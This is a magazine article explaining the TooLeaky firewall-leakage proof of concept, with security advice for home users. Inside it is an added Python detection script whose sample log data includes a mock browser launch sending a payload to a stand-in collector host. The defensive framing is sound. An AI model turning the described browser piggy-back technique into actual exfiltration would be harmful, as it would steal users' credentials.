Firewall leakage danger?

No big deal, says David Dorn, who has sorted the fix exclusively for Practical PC readers

If you read any of the security newsgroups that are out there, you may have become aware of two new 'proof of concept' applications that test personal firewalls like ZoneLabs' Zone Alarm (the personal firewall that we at PPC recommend and use ourselves) for outgoing traffic - usually referred to as 'leakage'.

To explain: a firewall should not just stop hackers from gaining access to your machine (logging into it), but should also be effective in preventing Trojan horse programs from sending any data from your PC out onto the Internet. What such programs do is harvest personal information (it could be all your IDs and passwords for every service you use on the Internet, including personal banking etc.) and then send it to a pre-determined address on the Internet. The ramifications are obvious.

A 'leaky' firewall that doesn't stop malicious programs like that is not doing the best job for you. That's one reason why we at Practical PC have recommended Zone Alarm - it is currently the best personal firewall for blocking data flow in both directions.

Having said that, though, no firewall will be effective if its user blithely grants Internet access to any and every piece of software that requests it. You've got to exercise some thought, and follow the general rule: if you're not sure, say 'no'. You can always change your mind later, having sought some advice!

TooLeaky

Now, this is where the 'TooLeaky' program comes in. Written by a researcher into computer security, it is a 'proof of concept' program that demonstrates a vulnerability in security systems. In this case, it points out that a piece of malware (malicious software) could actually use Internet Explorer (or any other browser) as the vehicle for its dastardly deeds.

What it relies on is the fact that most people (except those that are very security savvy) simply grant their Web browsers full permissions in their personal firewall. Thus, when you run the TooLeaky code, it fires up an instance of Internet Explorer, sends its message using the IE execution space (that is, it piggy-backs it), and terminates. If you've got your firewall set to allow Internet Explorer to simply go ahead and wander straight through your setup, then yes, TooLeaky will succeed every time under Windows 98 and later (including Windows XP).

If, however, you have set up your firewall such that IE has to ask permission before it connects, then TooLeaky fails, because you'd deny the connect request. For what it's worth, TooLeaky's message when it fails is, in fact, incorrect, misleading, and, in this writer's opinion, panic-mongering in the extreme.
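The tell-tale sign of the piggy-back trick described above is a browser being started by something other than the user, with the stolen data packed into the address it is told to open. The following is an added example (not from the article, nor from any firewall vendor) of how a defender might spot that pattern in process-creation logs; the log format, the list of 'trusted' parent programs and the query-length threshold are all constructed assumptions for illustration.

```python
"""Flag 'browser piggy-back' launches of the kind TooLeaky demonstrates:
a non-interactive parent process starts a browser with data packed into the URL.
Added example, not code from the Practical PC article. The log format
(parent|child|command line) is a constructed simplification."""
import re
from urllib.parse import urlsplit

# Parents a user would normally launch a browser from (assumption for this example).
TRUSTED_PARENTS = {"explorer.exe", "outlook.exe", "cmd.exe", "powershell.exe"}
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
MAX_QUERY = 40  # query strings longer than this are treated as suspicious (assumption)

def suspicious_launch(parent, child, cmdline):
    """Return a reason string if this launch looks like a browser piggy-back, else None."""
    if child.lower() not in BROWSERS or parent.lower() in TRUSTED_PARENTS:
        return None
    m = URL_RE.search(cmdline)
    if not m:
        return None
    url = urlsplit(m.group(0))
    if len(url.query) > MAX_QUERY:
        return f"{parent} launched {child} with {len(url.query)}-byte query to {url.hostname}"
    return None

def scan(lines):
    """lines: 'parent|child|cmdline' records; returns a list of (line number, reason)."""
    hits = []
    for n, line in enumerate(lines, 1):
        parent, child, cmdline = line.split("|", 2)
        reason = suspicious_launch(parent, child, cmdline)
        if reason:
            hits.append((n, reason))
    return hits

# Constructed sample records: a normal user launch, a short harmless query,
# and a non-browser program opening IE with a long payload in the URL.
SAMPLE = [
    "explorer.exe|iexplore.exe|iexplore.exe http://www.example.com/",
    "svchost.exe|msedge.exe|msedge.exe http://example.net/?q=1",
    "photo_viewer.exe|iexplore.exe|iexplore.exe http://collector.invalid/r.cgi?d=" + "A" * 60,
]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE):
        print(f"line {n}: {reason}")
```

Only the third record is reported; the first is excused by its trusted parent and the second by its short query.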

Safety

The thing is, at this point in time, there's no such thing as a completely secure system. In fact, the only system that is completely impervious to attack is one that's switched off! There are some bad people out there that have way too much time on their hands, and use it to find ways of attacking other folks' privacy and personal information. They'll exploit each and every vulnerability that they can find in order to further their nefarious plans.

The security business is a game of catch-up. Experts in computer security do exactly the same as the bad guys, but rather than exploiting the vulnerabilities they find, they try to remedy them, either themselves or in cahoots with the vendors of the vulnerable software. In essence, it all comes down to who finds the problem first. If it's the good guys, then it's not so much of a problem. If it's the bad guys, then it's a bigger problem.

Don't worry

In this case, the hole that the two 'proof of concept' programs exploit is well known, and is now even better known. You can guarantee that most companies that produce personal firewalls will already be onto this, and will be working out a way to prevent the behaviour from becoming a menace.

Indeed, it's only going to be a matter of concern if you get infected with a Trojan horse in the first place. So, the following guidelines are very, very important:

  • Keep antivirus programs up-to-date and run daily
  • Lock down email clients with the correct security zone settings (doesn't apply to AOL email)
  • Don't open attachments that you're not expecting

There's more information here about guarding against Trojans, and here and here (click the back button to come back here).

I'd strongly recommend that you read each of those three articles, if you haven't already, and implement everything we suggest in them. While you can never be 100% safe against all threats as long as your PC is running, if you do everything we suggest, you'll be as close as you can get, and it'll make it all the harder for the baddies to get at you.

David Dorn